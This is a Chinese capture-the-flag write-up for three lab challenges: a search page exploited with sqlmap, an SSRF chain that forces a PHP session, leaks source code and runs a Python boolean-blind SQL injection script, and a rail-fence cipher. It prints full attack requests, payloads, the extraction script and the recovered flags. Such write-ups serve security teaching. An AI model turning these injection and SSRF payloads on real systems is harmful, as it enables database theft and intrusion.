2025磐石行动第七周WP

1、白云新闻搜索

中国又出现了一个搜索巨头！据报道，中国网络大亨小明近日编写了一个搜索引擎，叫白云新闻搜索，具体链接在下方，该搜索链接功能欠打，界面乏力，小明出一包辣条悬赏漏洞，豪言入侵高手都去试试，你服不服？不服就去试试呗~(答案为flag{}形式，提交{}中内容即可)

题目界面如下：

首先考虑下面的内容从哪里来，每次都一样，那么不像搜索，而是数据库的内容。
通过burp把请求包down下来

POST / HTTP/1.1
Host: 192.168.0.10:10008
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: _identity=91a60559f578fa288bb633d808687c92e4d696eff3932eb26a463471d2e7fe15a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A28%3A%22%5B%22100%22%2C%22test100key%22%2C2592000%5D%22%3B%7D
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32word=%E5%86%85%E5%AE%B9*&number=1*

添加*作为可能的注入点，使用sqlmap进行注入

发现word是注入点

python3 .\sqlmap.py -r .\1.txt --current-db
python3 .\sqlmap.py -r .\1.txt -D news --tables
python3 .\sqlmap.py -r .\1.txt -D news -T admin --dump+----------------------------------------+----------+
| flag                                   | username |
+----------------------------------------+----------+
| flag{fabbf4abe040f2fdac8234099facdccb} | admin    |
+----------------------------------------+----------+

得到flag如下：

flag{fabbf4abe040f2fdac8234099facdccb}

2、ez_login

I know u know it

题目访问得到源码：

<?phpif(!isset($_SESSION)){highlight_file(__FILE__);die("no session");}include("./php/check_ip.php");error_reporting(0);$url = $_GET['url'];if(check_inner_ip($url)){if($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);$output = curl_exec($ch);$result_info = curl_getinfo($ch);curl_close($ch);}}else{echo "Your IP is internal yoyoyo";}?>

dirsearch发现admin.php

直接访问发现提示只能 本地访问

那么结合上面的源码，需要我们进行ssrf，那么第一个问题就是如何绕过

if(!isset($_SESSION)){highlight_file(__FILE__);die("no session");
}

直接在http头中伪造

Cookie: PHPSESSID=your_session_id

发现还是不行，后来得知需要开启

- 在使用 `$_SESSION` 之前，确保调用了 `session_start()`。
- 验证会话内容是否合法，例如检查特定的会话变量是否存在或是否符合预期。

那么继续问AI得到可以这样

1、 如何利用 PHP_SESSION_UPLOAD_PROGRESS 触发 session_start()

(1) 确认环境支持

首先需要确认目标服务器启用了 session.upload_progress 功能。可以通过以下方式验证：

• 查看 phpinfo() 输出，确认 session.upload_progress.enabled 是否为 On。
• 默认情况下，该功能通常是启用的。

(2) 构造文件上传请求

通过发送带有 PHP_SESSION_UPLOAD_PROGRESS 参数的文件上传请求，可以触发会话初始化。以下是具体步骤：

请求示例

POST /upload.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Cookie: PHPSESSID=your_session_id------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plainThis is a test file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--

关键点

• PHP_SESSION_UPLOAD_PROGRESS 参数是触发会话的关键。
• PHPSESSID Cookie 必须设置为你希望使用的会话 ID。
• 文件内容可以是任意数据。

然后使用上面的payload构造访问

发现有变化，参考源码这个是check内网IP地址不对，那么修改为localhost再次尝试

POST /?url=http://localhost/admin.php HTTP/1.1
Host: 192.168.0.10:10009
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Cookie: PHPSESSID=your_session_id
Content-Length: 316------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plainThis is a test file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--

发现有变化，而且还发现一个注释中存在一个压缩包，插件将python代码导出来

import requestssession = requests.Session()paramsGet = {"url":"http://localhost/yuanma_f0r_eAZy_logon.zip"}
paramsPost = {"PHP_SESSION_UPLOAD_PROGRESS":"12345"}
paramsMultipart = [('file', ('test.txt', "This is a test file.", 'application/octet-stream'))]
cookies = {"PHPSESSID":"your_session_id"}
response = session.post("http://192.168.0.10:10009/", data=paramsPost, files=paramsMultipart, params=paramsGet, cookies=cookies)print("Status code:   %i" % response.status_code)
print("Response body: %s" % response.content)with open("yuanma_f0r_eAZy_logon.zip", "wb") as f:f.write(response.content)

接着得到se1f_Log3n.php下面的源码：

<?php
include("./php/db.php");
include("./php/check_ip.php");
error_reporting(E_ALL);
$ip = $_SERVER["REMOTE_ADDR"];
if($ip !== "127.0.0.1"){exit();
}else{try{$sql = 'SELECT `username`,`password` FROM `user` WHERE `username`= "'.$username.'" and `password`="'.$password.'";';$result = $con->query($sql);echo $sql;}catch(Exception $e){echo $e->getMessage();}($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND die("error")) OR ( ($con->close() AND die('Try again!') )); 
}

发现直接拼接的SQL语句

$sql = 'SELECT `username`,`password` FROM `user` WHERE `username`= "'.$username.'" and `password`="'.$password.'";';

那么考虑SQL注入，使用万能密码发现如下返回，注意&符合需要2次url_encode，否则参数传递不进去

POST /?url=http://localhost/se1f_Log3n.php?username=admin'%20and%201%2523%2526password=1 HTTP/1.1
Host: 192.168.0.10:10009
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Cookie: PHPSESSID=your_session_id
Content-Length: 316------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plainThis is a test file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--

POST /?url=http://localhost/se1f_Log3n.php?username=admin'%20and%20if(1=1,0,0)%2523%2526password=1 
返回wrong username or passwordPOST /?url=http://localhost/se1f_Log3n.php?username=admin'%20and%20if(1=1,1,0)%2523%2526password=1 
返回correct?

那么通过控制判断的真假进行bool盲注

import requests
import time
session = requests.Session()
paramsPost = {"PHP_SESSION_UPLOAD_PROGRESS":"12345"}
paramsMultipart = [('file', ('test.txt', "This is a test file.", 'application/octet-stream'))]
cookies = {"PHPSESSID":"your_session_id"}
result = ""
for index in range(1, 100):#sql = "ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))"#secret,users#sql = "ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='secret'),{index},1))"#flagsql = "ascii(substr((select flag from secret),{index},1))"#flag{3f2f5a67062d3ff56c6ace415d01d3f8}sql_test = sql.format(index=index)head=32tail=127time.sleep(0.5)while( head < tail ):mid = (head + tail) >> 1paramsGet = {"url":"http://localhost/se1f_Log3n.php?username=admin' and if({sql}>{test_ascii},1,0)%23%26password=1".format(sql=sql_test,test_ascii=mid)}response = session.post("http://192.168.0.10:10009/", data=paramsPost, files=paramsMultipart, params=paramsGet, cookies=cookies)if "correct" in response.text:head = mid + 1else:tail = midlast = resultif head!=32:result += chr(head)else:breakprint(result)
#flag{3f2f5a67062d3ff56c6ace415d01d3f8}

3、篱笆墙的影子

题目如下：

felhaagv{ewtehtehfilnakgw}

篱笆墙提示栅栏

得到flag如下：

分为13栏时，解密结果为:flag{wethinkwehavetheflag}